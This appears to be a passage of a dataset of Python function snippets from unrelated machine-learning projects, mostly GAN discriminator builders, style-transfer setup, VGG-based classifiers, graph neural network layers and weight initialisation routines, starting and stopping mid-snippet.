self.with_auxiliary_head:\n if isinstance(self.auxiliary_head, nn.ModuleList):\n for aux_head in self.auxiliary_head:\n aux_head.init_weights()\n else:\n self.auxiliary_head.init_weights()", "def __init__(self, hparams):\n # init superclass\n super(FastNeuralStyleSystem, self).__init__()\n self.hparams = hparams\n torch.manual_seed(hparams.seed)\n np.random.seed(hparams.seed)\n\n self.batch_size = hparams.batch_size\n if hparams.model == \"hrnet\":\n self.style_model = HRNet()\n else:\n self.style_model = TransformerNet()\n self.vgg_extractor = Vgg16(requires_grad=False)\n\n self.transform = transforms.Compose([\n transforms.Resize(hparams.image_size),\n transforms.CenterCrop(hparams.image_size),\n transforms.ToTensor(),\n transforms.Lambda(lambda x: x.mul(255))\n ])\n\n self.style_transform = transforms.Compose([\n transforms.Resize(hparams.image_size),\n transforms.CenterCrop(hparams.image_size),\n transforms.ToTensor(),\n transforms.Lambda(lambda x: x.mul(255))\n ])\n\n content_image = utils.load_image(\n self.hparams.content_image, scale=self.hparams.content_scale)\n self.content_image = self.style_transform(content_image)\n\n style = utils.load_image(os.path.join(\n 'images', 'style-images', f'{hparams.style_image}.jpg'), scale=0.5)\n style = self.style_transform(style).requires_grad_(False)\n self.style_image = style.repeat(hparams.batch_size, 1, 1, 1)\n\n self.features_style = self.vgg_extractor(\n utils.normalize_batch(self.style_image))\n self.gram_style = [utils.gram_matrix(y) for y in self.features_style]\n\n # self.temp_dir = f\"{self.hparams.output_dir}/{self.hparams.style_image}_steps_c_{self.hparams.content_weight}_s_{self.hparams.style_weight}\"\n # os.makedirs(self.temp_dir, exist_ok=True)", "def init():\n ########################\n # OPTIONS\n ########################\n # Debugging tools\n global TIMER # displays time of every major step\n TIMER = True\n global MONITOR # displays monitoring infos\n MONITOR = False\n \n global directories\n directories = {'1Face': 'data/1Face/',\n 
'2Faces': 'data/2Faces/',\n '3Faces': 'data/3Faces/',\n 'test': 'data/test/'}\n \n # Opt. swicthes\n global maxfinder # to find the max dim. amongst the pictures\n maxfinder = False\n global ML_mode\n ML_mode = {'CNN_Train': False,\n 'CNN_Pred' : True,\n 'Sampler': True}\n \n # Global variables\n global num_pics\n num_pics = {'1Face': 0,\n '2Faces': 0,\n '3Faces': 0}\n global labels\n labels = {'1Face': 0,\n '2Faces': 1,\n '3Faces': 2}\n global num_data\n num_data = 0\n global splitsize # Fraction of data to build the training set\n splitsize = 0.7 \n global maxheight # Resize the pictures to a power of 2 for CNN (2^8 here)\n maxheight = 128\n global maxwidth\n maxwidth = 128\n global TreshEdge # Number of consecutive black pixels to define an edge\n TreshEdge = 2\n global TreshFace # Number of white pixels to define a face (or large edge)\n TreshFace = maxheight/16", "def __init__(self, opt):\n BaseModel.__init__(self, opt) # call the initialization method of BaseModel\n\n self.opt = opt\n if opt.d_loss_mode == 'wgan' and not opt.use_gp:\n raise NotImplementedError('using wgan on D must be with use_gp = True.')\n\n self.loss_names = ['G_real', 'G_fake', 'D_real', 'D_fake', 'D_gp', 'G', 'D']\n self.visual_names = ['real_visual', 'gen_visual']\n\n if self.isTrain: # only defined during training time\n self.model_names = ['G', 'D']\n else:\n self.model_names = ['G']\n\n if self.opt.cgan:\n probs = np.ones(self.opt.cat_num)/self.opt.cat_num \n self.CatDis = Categorical(torch.tensor(probs))\n\n # define networks \n self.netG = networks.define_G(opt.z_dim, opt.output_nc, opt.ngf, opt.netG,\n opt.g_norm, opt.cgan, opt.cat_num, not opt.no_dropout, opt.init_type, opt.init_gain, self.gpu_ids)\n\n if self.isTrain: # define a discriminator; conditional GANs need to take both input and output images; Therefore, #channels for D is input_nc + output_nc\n self.netD = networks.define_D(opt.input_nc, opt.ndf, opt.netD,\n opt.d_norm, opt.cgan, opt.cat_num, opt.init_type, opt.init_gain, self.gpu_ids)\n\n if self.isTrain: # only defined during training time\n # define G mutations \n self.G_mutations = []\n for g_loss in opt.g_loss_mode: \n self.G_mutations.append(networks.GANLoss(g_loss, 'G', opt.which_D).to(self.device))\n # define loss functions\n self.criterionD = networks.GANLoss(opt.d_loss_mode, 'D', opt.which_D).to(self.device)\n # initialize optimizers\n self.optimizer_G = torch.optim.Adam(self.netG.parameters(), lr=opt.lr_g, betas=(opt.beta1, opt.beta2))\n self.optimizer_D = torch.optim.Adam(self.netD.parameters(), lr=opt.lr_d, betas=(opt.beta1, opt.beta2))\n self.optimizers.append(self.optimizer_G)\n self.optimizers.append(self.optimizer_D)\n \n # Evolutinoary candidatures setting (init) \n\n self.G_candis = [] \n self.optG_candis = [] \n self.last_evaly = []\n self.last_evalimgs = []\n self.min_Fq = 100.0\n self.max_Fq = -100.0\n self.min_Fd = 100.0\n self.max_Fd = -100.0\n self.normFq = lambda f : (f-self.min_Fq) / (self.max_Fq-self.min_Fq)\n self.normFd = lambda f : (f-self.min_Fd) / (self.max_Fd-self.min_Fd)\n for i in range(opt.candi_num): \n self.G_candis.append(copy.deepcopy(self.netG.state_dict()))\n self.optG_candis.append(copy.deepcopy(self.optimizer_G.state_dict()))\n \n # visulize settings \n self.N =int(np.trunc(np.sqrt(min(opt.batch_size, 64))))\n if self.opt.z_type == 'Gaussian': \n self.z_fixed = torch.randn(self.N*self.N, opt.z_dim, 1, 1, device=self.device) \n elif self.opt.z_type == 'Uniform': \n self.z_fixed = torch.rand(self.N*self.N, opt.z_dim, 1, 1, device=self.device)*2. - 1. 
\n if self.opt.cgan:\n yf = self.CatDis.sample([self.N*self.N])\n self.y_fixed = one_hot(yf, [self.N*self.N, self.opt.cat_num])\n\n # the # of image for each evluation\n self.eval_size = max(math.ceil((opt.batch_size * opt.D_iters) / opt.candi_num), opt.eval_size)", "def __init__(self, mode, cfg):\n super(DMCM, self).__init__()\n\n self.conv_net = cfg.get_image_net(mode)\n self.sparse_net = cfg.get_genes_net(mode)\n\n # Matrix network does not need weight initialization because there can\n # be no vanishing gradients.\n self.conv_net.apply(_init_weights_xavier)", "def build_discriminator(self):\n\n def d_block(layer_input, filters, strides=1, bn=True):\n\n d = tf.keras.layers.Conv2D(filters, kernel_size=3, strides=strides, padding='same')(layer_input)\n if bn:\n d = tf.keras.layers.BatchNormalization(momentum=0.8)(d)\n d = tf.keras.layers.LeakyReLU(alpha=0.2)(d)\n \n return d\n\n # Input img\n d0 = tf.keras.layers.Input(shape=self.hr_shape)\n\n d1 = d_block(d0, self.df, bn=False)\n d2 = d_block(d1, self.df, strides=2)\n d3 = d_block(d2, self.df)\n d4 = d_block(d3, self.df, strides=2)\n d5 = d_block(d4, self.df * 2)\n d6 = d_block(d5, self.df * 2, strides=2)\n d7 = d_block(d6, self.df * 2)\n d8 = d_block(d7, self.df * 2, strides=2)\n\n validity = tf.keras.layers.Conv2D(1, kernel_size=1, strides=1, activation='sigmoid', padding='same')(d8)\n\n return tf.keras.models.Model(d0, validity)", "def build_model(cls, args):\n base_architecture(args) \n return StyleGANGeneratorPretrain(args)", "def __init__(self, machine):\n super().__init__(machine)\n self.features['has_rgb_dmds'] = True", "def __init__(self):\n torch.nn.Module.__init__(self)\n # Convolution and pooling layers of VGG-16.\n self.features = torchvision.models.vgg16(pretrained=True).features\n self.features = torch.nn.Sequential(*list(self.features.children())\n [:-1]) # Remove pool5.\n # Linear classifier.\n self.fc = torch.nn.Linear(512**2, 36)", "def train_discriminator(gan, generator, discriminator, x_train, batch_size):\n # Get a random set of input noise.\n noise = get_noise(batch_size)\n\n # Generate fake MNIST images.\n generated_images = generator.predict(noise)\n # Get a random set of images from the actual MNIST dataset.\n image_batch = x_train[np.random.randint(0, x_train.shape[0], size=batch_size)]\n # Put them together in a single vector(list).\n X = np.concatenate([image_batch, generated_images])\n\n # Generate 0.0 (fake) for the whole vector.\n Y = np.zeros(2*batch_size)\n # Label real images correctly as 1.0.\n Y[:batch_size] = 1.0\n\n discriminator.trainable = True\n discriminator.train_on_batch(X, Y)", "def build_discriminator(self):\n # label input\n in_label = Input(shape=(1,))\n # embedding for categorical input\n li = Embedding(self.n_classes, 50)(in_label)\n # scale up to image dimensions with linear activation\n n_nodes = self.in_shape[0] * self.in_shape[1]\n li = Dense(n_nodes)(li)\n # reshape to additional channel\n li = Reshape((self.in_shape[0], self.in_shape[1], 1))(li)\n # image input\n in_image = Input(shape=self.in_shape)\n # concat label as a channel\n merge = Concatenate()([in_image, li])\n # downsample\n fe = Conv2D(128, (3,3), strides=(2,2), padding='same')(merge)\n fe = LeakyReLU(alpha=0.2)(fe)\n # downsample\n fe = Conv2D(128, (3,3), strides=(2,2), padding='same')(fe)\n fe = LeakyReLU(alpha=0.2)(fe)\n # flatten feature maps\n fe = Flatten()(fe)\n # dropout\n fe = Dropout(0.4)(fe)\n # output\n out_layer = Dense(1, activation='sigmoid')(fe)\n # define model\n self.d_model = Model([in_image, 
in_label], out_layer)\n # compile model\n opt = Adam(lr=0.0002, beta_1=0.5)\n self.d_model.compile(loss='binary_crossentropy', optimizer=opt, metrics=['accuracy'])", "def discriminator_block(self, name):\n\n if self.fit_mask : \n \n inputs = Input(shape=(2+self.nb_classe_mask, self.image_row, self.image_column, self.image_depth), name='dis_input')\n else :\n # In:\n inputs = Input(shape=(2, self.image_row, self.image_column, self.image_depth), name='dis_input')\n\n # Input 64\n disnet = Conv3D(self.discriminator_kernel * 1, 4, strides=2,\n padding='same',\n kernel_initializer='he_normal',\n data_format='channels_first',\n name=name + '_conv_dis_1')(inputs)\n disnet = LeakyReLU(0.01)(disnet)\n\n # Hidden 1 : 32\n disnet = Conv3D(self.discriminator_kernel * 2, 4, strides=2,\n padding='same',\n kernel_initializer='he_normal',\n data_format='channels_first',\n name=name + '_conv_dis_2')(disnet)\n disnet = LeakyReLU(0.01)(disnet)\n\n # Hidden 2 : 16\n disnet = Conv3D(self.discriminator_kernel * 4, 4, strides=2,\n padding='same',\n kernel_initializer='he_normal',\n data_format='channels_first',\n name=name + '_conv_dis_3')(disnet)\n disnet = LeakyReLU(0.01)(disnet)\n\n # Hidden 3 : 8\n disnet = Conv3D(self.discriminator_kernel * 8, 4, strides=2,\n padding='same',\n kernel_initializer='he_normal',\n data_format='channels_first',\n name=name + '_conv_dis_4')(disnet)\n disnet = LeakyReLU(0.01)(disnet)\n\n # Hidden 4 : 4\n disnet = Conv3D(self.discriminator_kernel * 16, 4, strides=2,\n padding='same',\n kernel_initializer='he_normal',\n data_format='channels_first',\n name=name + '_conv_dis_5')(disnet)\n disnet = LeakyReLU(0.01)(disnet)\n\n # Decision : 2\n decision = Conv3D(1, 2, strides=1,\n use_bias=False,\n kernel_initializer='he_normal',\n data_format='channels_first',\n name='dis_decision')(disnet)\n\n decision = Reshape((1,))(decision)\n\n model = Model(inputs=[inputs], outputs=[decision], name=name)\n return model", "def __init__(self):\r\n torch.nn.Module.__init__(self)\r\n # Convolution and pooling layers of VGG-16.\r\n self.features = torchvision.models.vgg19_bn(pretrained=False).features\r\n self.features = torch.nn.Sequential(*list(self.features.children())\r\n [:-1]) # Remove pool5.\r\n # Linear classifier.\r\n self.fc = torch.nn.Linear(512**2, 11)", "def init_weights(self, pretrained=None):\n if pretrained is not None:\n self.pretrained = pretrained\n self.backbone.init_weights(self.pretrained)\n self.mesh_head.init_weights()\n if self.with_gan:\n self.discriminator.init_weights()", "def __init__(self, random_generator: RandomState):\n super().__init__([MoldelStacker(random_generator), SocialMediaLayer()])", "def __init__(self, generator, discriminator, noise_dim, save_path):\n self.generator = generator\n self.discriminator = discriminator\n self.noise_dim = noise_dim\n self.save_path = save_path\n self.check_points_path = os.path.join(save_path, 'check_points')\n self.output_image_path = os.path.join(save_path, 'images_during_training')\n self.generator.generate()", "def initialisation(self):\n self.create_variables()\n self.create_placeholders()\n self.build_model()\n self.reset_lr(None, True)\n self.build_loss()\n self.initialised = True", "def make_discriminator():\n constraint_shape = Params.environment.constraint_shape()\n solution_shape = Params.environment.solution_shape()\n joint_shape = constraint_shape[:]\n joint_shape[0] += solution_shape[0]\n\n constraint_input = placeholder_node(\"constraint_input\", constraint_shape, 1)\n solution_input = 
placeholder_node(\"solution_input\", solution_shape, 1)\n joint_input = tf.concat([constraint_input, solution_input], 1)\n return (\n constraint_input,\n solution_input,\n FeedforwardNetwork(\n name=\"artificial_discriminator\",\n session=Params.session,\n input_shape=joint_shape,\n layer_shapes=Params.internal_layer_shapes + [[1]],\n activations=Params.activation,\n input_node=joint_input,\n save_location=Params.save_location,\n ),\n )", "def __init__(self, apply_nonlin=None, batch_dice=False, do_bg=True, smooth=1.,\n square=False, square_volumes=False):\n super(GDL, self).__init__()\n\n self.square_volumes = square_volumes\n self.square = square\n self.do_bg = do_bg\n self.batch_dice = batch_dice\n self.apply_nonlin = apply_nonlin\n self.smooth = smooth", "def setup_training_discriminator(model):\n train_dir = os.path.join(FLAGS.log_root, \"train-discriminator\")\n if not os.path.exists(train_dir): os.makedirs(train_dir)\n\n model.build_graph() # build the graph\n\n saver = tf.train.Saver(max_to_keep=20) # we use this to load checkpoints for decoding\n sess = tf.Session(config=util.get_config())\n #init = tf.global_variables_initializer()\n #sess.run(init)\n util.load_ckpt(saver, sess, ckpt_dir=\"train-discriminator\")\n\n\n\n return sess, saver,train_dir", "def __init__(self, nclasses, device):\n super(HybridNN, self).__init__(nclasses, device)\n self.data_dev = qml.device(device, wires=self.req_qub_out)\n self.device = device\n self.model_dev = None\n self.nn = None\n self.bias = True", "def __init__(self):\n\n super(LocalDiscriminator, self).__init__()\n\n # input image will have the size of 128x128x3\n self.first_conv_layer = TransitionDown(in_channels=3, out_channels=32, kernel_size=5)\n self.second_conv_layer = TransitionDown(in_channels=32, out_channels=64, kernel_size=5)\n self.third_conv_layer = TransitionDown(in_channels=64, out_channels=128, kernel_size=5)\n self.fourth_conv_layer = TransitionDown(in_channels=128, out_channels=32, kernel_size=5)\n self.fifth_conv_layer = TransitionDown(in_channels=32, out_channels=1, kernel_size=5)\n \n '''\n self.fc1 = nn.Linear(4 * 4 * 512, 10)\n self.fc2 = nn.Linear(10, 1)\n\n torch.nn.init.xavier_uniform(self.fc1.weight)\n torch.nn.init.xavier_uniform(self.fc2.weight)\n '''", "def __init__(self, opt):\n BaseModel.__init__(self, opt)\n self.loss_names = ['G_GAN', 'D_real', 'D_fake', 'Feat', 'VGG', 'SSIM', 'PSNR']\n self.visual_names = ['fake_B', 'real_B']\n if self.isTrain:\n self.model_names = ['G', 'D']\n else:\n self.model_names = ['G']\n\n self.netG = generator.define_G(opt.input_nc, opt.output_nc, opt.ngf, opt.netG, opt.norm,\n not opt.no_dropout, opt.init_type, opt.init_gain, self.gpu_ids,\n not opt.no_transp_conv,\n opt.n_downsample_global, opt.n_blocks_global, opt.n_local_enhancers,\n opt.n_blocks_local)\n\n if self.isTrain:\n self.netD = discriminator.define_D(opt.input_nc + opt.output_nc, opt.ndf, 'pix2pixHD_multiscale',\n opt.n_layers_D, opt.norm, opt.init_type, opt.init_gain, self.gpu_ids,\n not (opt.gan_mode == 'lsgan'), opt.num_D)\n\n self.criterionGAN = loss.GANLoss(opt.gan_mode, multiscale_D=opt.netD == 'pix2pixHD_multiscale').to(\n self.device)\n self.criterionVGG = loss.VGGLoss().to(self.device)\n self.criterionFeat = loss.FeatureMatchingLoss(opt.n_layers_D, opt.num_D)\n\n self.criterionSSIM = loss.SkimageLoss(partial(ssim, multichannel=True))\n self.criterionPSNR = loss.SkimageLoss(psnr)\n\n if opt.netG.startswith('pix2pixHD') and (opt.n_epochs_fix_global > 0):\n params_dict = dict(self.netG.named_parameters())\n 
netG_params = []\n for key, value in params_dict.items():\n if key.startswith('model' + str(opt.n_local_enhancers)):\n netG_params += [value]\n else:\n netG_params = self.netG.parameters()\n\n self.optimizer_G = torch.optim.Adam(netG_params, lr=opt.lr, betas=(opt.beta1, 0.999))\n self.optimizer_D = torch.optim.Adam(self.netD.parameters(), lr=opt.lr, betas=(opt.beta1, 0.999))\n self.optimizers.append(self.optimizer_G)\n self.optimizers.append(self.optimizer_D)\n\n if opt.load_pretrain:\n pretrained_path = '' if not self.isTrain else opt.load_pretrain\n self.load_network(self.netG, 'G', opt.epoch, pretrained_path)\n if self.isTrain:\n self.load_network(self.netD, 'D', opt.epoch, pretrained_path)\n\n self.real_A = None\n self.real_B = None\n self.fake_A = None\n self.fake_B = None\n self.loss_D_real = None\n self.loss_D_fake = None\n self.loss_D = None\n self.loss_G_GAN = None\n self.loss_Feat = None\n self.loss_VGG = None\n self.loss_G = None\n self.loss_SSIM = None\n self.loss_PSNR = None", "def __init__(self, hidden_shape, sigma_g=1.0, sigma_l=1.0, alpha=0.5,\n mode='gaus'):\n self.hidden_shape = hidden_shape\n self.mode = mode\n self.sigma_g = np.full(hidden_shape, sigma_g)\n self.sigma_l = np.full(hidden_shape, sigma_l)\n self.alpha = np.full(hidden_shape, alpha)\n self.centers = None\n self.weights = None", "def setUp(self):\n # The short NSC used in this example\n self.net_nsc = [\n (1, 4, 0, 0, 0), # Layer 1: Identity(input)\n (2, 1, 3, 1, 0), # Layer 2: Convolution(Layer1)\n (3, 1, 3, 2, 0), # Layer 3: Convolution(Layer2)\n (4, 5, 0, 1, 3), # Layer 4: Convolution(Layer1)\n (5, 7, 0, 0, 0), # Layer 5: Convolution(Layer4)\n ]", "def DCGAN_discriminator(img_dim, nb_patch, bn_mode, model_name=\"DCGAN_discriminator\", use_mbd=True):\n\n list_input = [Input(shape=img_dim, name=\"disc_input_%s\" % i) for i in range(nb_patch)]\n\n if K.image_dim_ordering() == \"th\":\n bn_axis = 1\n else:\n bn_axis = -1\n\n nb_filters = 64\n nb_conv = int(np.floor(np.log(img_dim[1]) / np.log(2)))\n list_filters = [nb_filters * min(8, (2 ** i)) for i in range(nb_conv)]\n\n # First conv\n x_input = Input(shape=img_dim, name=\"discriminator_input\")\n # x = Convolution2D(list_filters[0], 3, 3, subsample=(2, 2), name=\"disc_conv2d_1\", border_mode=\"same\")(x_input)\n # x = BatchNormalization(mode=bn_mode, axis=bn_axis)(x)\n # x = LeakyReLU(0.2)(x)\n\n x = MaxPooling2D(\n pool_size=(2, 2), strides=(2, 2))(x_input)\n x = Convolution2D(\n list_filters[0]/8, 1, 1, activation='relu', init='glorot_uniform',\n border_mode='same', name='disc_conv2d_1')(x)\n x = BatchNormalization(mode=bn_mode, axis=bn_axis)(x)\n e1 = Convolution2D(\n list_filters[0]/2, 1, 1, activation='relu', init='glorot_uniform',\n border_mode='same')(x)\n e2 = Convolution2D(\n list_filters[0]/2, 3, 3, activation='relu', init='glorot_uniform',\n border_mode='same')(x)\n x = merge(\n [e1, e2], mode='concat', concat_axis=bn_axis)\n\n # Next convs\n for i, f in enumerate(list_filters[1:]):\n name = \"disc_conv2d_fire_%s\" % (i + 2)\n # x = Convolution2D(f, 3, 3, subsample=(2, 2), name=name, border_mode=\"same\")(x)\n # x = BatchNormalization(mode=bn_mode, axis=bn_axis)(x)\n # x = LeakyReLU(0.2)(x)\n x = MaxPooling2D(\n pool_size=(2, 2), strides=(2, 2))(x)\n x = Convolution2D(\n f/8, 1, 1, activation='relu', init='glorot_uniform',\n border_mode='same', name=name)(x)\n x = BatchNormalization(mode=bn_mode, axis=bn_axis)(x)\n e1 = Convolution2D(\n f/2, 1, 1, activation='relu', init='glorot_uniform',\n border_mode='same')(x)\n e2 = Convolution2D(\n f/2, 3, 
3, activation='relu', init='glorot_uniform',\n border_mode='same')(x)\n x = merge(\n [e1, e2], mode='concat', concat_axis=bn_axis)\n\n x_flat = Flatten()(x)\n x = Dense(2, activation='softmax', name=\"disc_dense\")(x_flat)\n\n PatchGAN = Model(input=[x_input], output=[x, x_flat], name=\"PatchGAN\")\n print(\"PatchGAN summary\")\n PatchGAN.summary()\n\n x = [PatchGAN(patch)[0] for patch in list_input]\n x_mbd = [PatchGAN(patch)[1] for patch in list_input]\n\n if len(x) > 1:\n x = merge(x, mode=\"concat\", name=\"merge_feat\")\n else:\n x = x[0]\n\n if use_mbd:\n if len(x_mbd) > 1:\n x_mbd = merge(x_mbd, mode=\"concat\", name=\"merge_feat_mbd\")\n else:\n x_mbd = x_mbd[0]\n\n num_kernels = 100\n dim_per_kernel = 5\n\n M = Dense(num_kernels * dim_per_kernel, bias=False, activation=None)\n MBD = Lambda(minb_disc, output_shape=lambda_output)\n\n x_mbd = M(x_mbd)\n x_mbd = Reshape((num_kernels, dim_per_kernel))(x_mbd)\n x_mbd = MBD(x_mbd)\n x = merge([x, x_mbd], mode='concat')\n\n x_out = Dense(2, activation=\"softmax\", name=\"disc_output\")(x)\n\n discriminator_model = Model(input=list_input, output=[x_out], name=model_name)\n\n return discriminator_model", "def __init__(self, **config):\n super(CNN, self).__init__()\n in_channel = [26] + config['cnn_target_filters']\n kernels = config['cnn_target_kernels']\n self.layer_size = len(config['cnn_target_filters'])\n self.visual_attention=config['visual_attention']\n self.concatenation=config['concatenation']\n self.convs = nn.ModuleList([nn.Conv1d(in_channels=in_channel[i],\n out_channels=in_channel[i + 1],\n kernel_size=kernels[i]) for i in range(self.layer_size)])\n self.convs = self.convs.float()\n self.attention = config['attention']\n protein_size = self.simulate_output((26, 1000))\n self.fc = nn.Linear(protein_size, config['hidden_dim_protein'])\n self.Attention=Attention(**config)", "def build_patch_discriminator_SN(self, model_shape, filters=32, k_size=4, drop=False, rate=0.5, summary=False, model_file=None, name='gan_d_'):\n if (model_file):\n \"\"\"\n Load pretreined model\n \"\"\"\n model = self.utils.build_pretrained_model(model_file)\n if (summary):\n model.summary()\n return model\n else:\n \"\"\"\n Create a Discriminator Model using hyperparameters values defined as follows\n \"\"\"\n #init = RandomNormal(stddev=0.02)\n init = 'glorot_uniform'\n n_rows = model_shape[0]\n n_cols = model_shape[1]\n c_dims = model_shape[2]\n\n input_shape = (n_rows, n_cols, c_dims)\n input_layer = Input(shape=input_shape, name=name+'input')\n\n d = self.Conv2D_SN_Block(input_layer, filters, k_size=k_size, name=name+'1')\n d = self.Conv2D_SN_Block(d, 2*filters, k_size=k_size, name=name+'2')\n d = self.Conv2D_SN_Block(d, 4*filters, k_size=k_size, name=name+'3')\n d = self.Conv2D_SN_Block(d, 8*filters, strides=1, k_size=k_size, name=name+'4')\n d = self.Conv2D_SN_Block(d, 8*filters, strides=1, k_size=k_size, name=name+'5')\n\n if drop:\n d = Dropout(rate=0.5, name=name+'_dropout')(d, training=True)\n logits = ConvSN2D(1, k_size, strides=1, padding='same', kernel_initializer=init, name=name+'logits')(d)\n out = Activation('sigmoid', name=name+'sigmoid')(logits)\n\n model = Model(inputs=[input_layer], outputs=[out, logits], name='Discriminator_'+name[-3:])\n if (summary):\n model.summary()\n return model", "def init():\n global neural_network\n global labels\n\n # load objects required by run() for inferencing\n model_dir = Model.get_model_path(\"mnist-fashion\")\n # neural model\n neural_network = 
keras.models.load_model(f\"{model_dir}/neural-network.h5\")\n # labels\n with open(f\"{model_dir}/labels.jsonpickle\", \"r\") as labels_file:\n labels = jsonpickle.decode(labels_file.read())", "def __init__(self, n):\n super().__init__()\n self.n = n\n self.block_names = ['block4', 'block7', 'block8', 'block9', 'block10', 'block11']\n block_sizes = [512, 1024, 512, 256, 256, 256]\n for name, size in zip(self.block_names, block_sizes):\n setattr(self, name, nn.Conv2d(size, self.n*cfg.ASPECT_RATIOS, kernel_size=3, padding=1))", "def init_train(self):\n data = self.loader.load_labelled_data(self.conf.split, 'training')\n\n # Initialise unlabelled data iterator\n num_ul = 0\n if self.conf.ul_mix > 0:\n ul_data = self.loader.load_unlabelled_data(self.conf.split, 'all')\n\n # calculate number of unlabelled images as a proportion of the labelled images\n num_ul = int(data.size() * self.conf.ul_mix)\n num_ul = num_ul if num_ul <= ul_data.size() else ul_data.size()\n log.info('Sampling %d unlabelled images out of total %d.' % (num_ul, ul_data.size()))\n ul_data.sample(num_ul)\n self.gen_X_U = data_utils.generator(self.conf.batch_size, 'overflow', ul_data.images)\n\n # Initialise labelled data iterator\n assert self.conf.l_mix >= 0\n\n # calculate number of labelled images\n num_l = int(data.size() * self.conf.l_mix)\n num_l = num_l if num_l <= data.size() else data.size()\n log.info('Using %d labelled images out of total %d.' % (num_l, data.size()))\n train_images = data.images[:num_l]\n train_masks = data.masks[:num_l]\n\n self.conf.unlabelled_image_num = num_ul\n self.conf.labelled_image_num = num_l\n self.conf.data_len = num_ul if num_ul > num_l else num_l\n self.conf.batches = int(np.ceil(self.conf.data_len / self.conf.batch_size))\n self.conf.save()\n\n self.gen_X_L = data_utils.generator(self.conf.batch_size, 'overflow', train_images, train_masks)\n\n # Initialise real masks iterator for discriminator training, using the real masks from the data CV split.\n self.other_masks = data_utils.generator(self.conf.batch_size, 'overflow', data.masks + 0)", "def build_discriminator2D(self, model_shape, filters=32, k_size=4, drop=False, rate=0.5, extra_conv=False, summary=False, ln=False, model_file=None, name='gan_d_'):\n if (model_file):\n \"\"\"\n Load pretreined model\n \"\"\"\n model = self.utils.build_pretrained_model(model_file)\n if (summary):\n model.summary()\n return model\n else:\n \"\"\"\n Create a Discriminator Model using hyperparameters values defined as follows\n \"\"\"\n n_rows = model_shape[0]\n n_cols = model_shape[1]\n c_dims = model_shape[2]\n\n input_shape = (n_rows, n_cols, c_dims) \n input_layer = Input(shape=input_shape, name=name+'input')\n\n d = self.Conv2D_Block(input_layer, filters, k_size=k_size, name=name+'1', bn=False) # 30x30x32\n d = self.Conv2D_Block(d, 2*filters, k_size=k_size, ln=ln, name=name+'2') # 15x15x64\n d = self.Conv2D_Block(d, 4*filters, k_size=k_size, ln=ln, name=name+'3') # 8x8x128\n if extra_conv:\n d = self.Conv2D_Block(d, 8*filters, strides=2, k_size=k_size, ln=ln, name=name+'4') # 8x8x256 \n d = self.Conv2D_Block(d, 16*filters, strides=1, k_size=k_size, ln=ln, name=name+'5') # 8x8x256\n else:\n d = self.Conv2D_Block(d, 8*filters, strides=1, k_size=k_size, ln=ln, name=name+'4')\n\n d = Flatten(name=name+'flatten')(d)\n if drop:\n d = Dropout(rate=rate, name=name+'dropout')(d, training=True)\n logits = Dense(1, activation='linear', kernel_initializer=RandomNormal(stddev=0.02), name=name+'dense')(d)\n out = Activation('sigmoid', 
name=name+'sigmoid')(logits)\n\n model = Model(inputs=[input_layer], outputs=[out, logits], name='Discriminator')\n if (summary):\n model.summary()\n return model", "def initialize(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\n nn.init.xavier_normal_(m.weight)\n if m.bias is not None:\n nn.init.constant_(m.bias, 0)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.constant_(m.weight, 1)\n nn.init.constant_(m.bias, 0)", "def init(self):\n self.reparam_layers = []\n if self.model_type == \"GCN\":\n for i in range(self.num_layers):\n if self.reparam_all_layers is True:\n is_reparam = True\n elif isinstance(self.reparam_all_layers, tuple):\n reparam_all_layers = tuple([kk + self.num_layers if kk < 0 else kk for kk in self.reparam_all_layers])\n is_reparam = i in reparam_all_layers\n else:\n raise\n if is_reparam:\n self.reparam_layers.append(i)\n setattr(self, \"conv{}\".format(i + 1),\n GCNConv(self.num_features if i == 0 else self.latent_size,\n self.latent_size if i != self.num_layers - 1 else self.num_classes,\n cached=True,\n reparam_mode=self.reparam_mode if is_reparam else None,\n prior_mode=self.prior_mode if is_reparam else None,\n sample_size=self.sample_size,\n bias=True if self.with_relu else False,\n val_use_mean=self.val_use_mean,\n normalize=self.normalize,\n ))\n # self.conv1 = ChebConv(self.num_features, 16, K=2)\n # self.conv2 = ChebConv(16, self.num_features, K=2)\n\n elif self.model_type == \"GAT\":\n latent_size = int(self.latent_size / 2) # Under the default setting, latent_size = 8\n for i in range(self.num_layers):\n if i == 0:\n input_size = self.num_features\n else:\n if self.struct_dropout_mode[0] == 'DNsampling' or (self.struct_dropout_mode[0] == 'standard' and len(self.struct_dropout_mode) == 3):\n input_size = latent_size * 8 * 2\n else:\n input_size = latent_size * 8\n if self.reparam_all_layers is True:\n is_reparam = True\n elif isinstance(self.reparam_all_layers, tuple):\n reparam_all_layers = tuple([kk + self.num_layers if kk < 0 else kk for kk in self.reparam_all_layers])\n is_reparam = i in reparam_all_layers\n else:\n raise\n if is_reparam:\n self.reparam_layers.append(i)\n setattr(self, \"conv{}\".format(i + 1), GATConv(\n input_size,\n latent_size if i != self.num_layers - 1 else self.num_classes,\n heads=8 if i != self.num_layers - 1 else 1, concat=True,\n reparam_mode=self.reparam_mode if is_reparam else None,\n prior_mode=self.prior_mode if is_reparam else None,\n val_use_mean=self.val_use_mean,\n struct_dropout_mode=self.struct_dropout_mode,\n sample_size=self.sample_size,\n ))\n if self.struct_dropout_mode[0] == 'DNsampling' or (self.struct_dropout_mode[0] == 'standard' and len(self.struct_dropout_mode) == 3):\n setattr(self, \"conv{}_1\".format(i + 1), GATConv(\n input_size,\n latent_size if i != self.num_layers - 1 else self.num_classes,\n heads=8 if i != self.num_layers - 1 else 1, concat=True,\n reparam_mode=self.reparam_mode if is_reparam else None,\n prior_mode=self.prior_mode if is_reparam else None,\n val_use_mean=self.val_use_mean,\n struct_dropout_mode=self.struct_dropout_mode,\n sample_size=self.sample_size,\n ))\n # On the Pubmed dataset, use heads=8 in conv2.\n \n else:\n raise Exception(\"Model_type {} is not valid!\".format(self.model_type))\n\n self.reparam_layers = sorted(self.reparam_layers)\n \n if self.model_type == \"GCN\":\n if self.with_relu:\n reg_params = [getattr(self, \"conv{}\".format(i+1)).parameters() for i in range(self.num_layers - 1)]\n self.reg_params = 
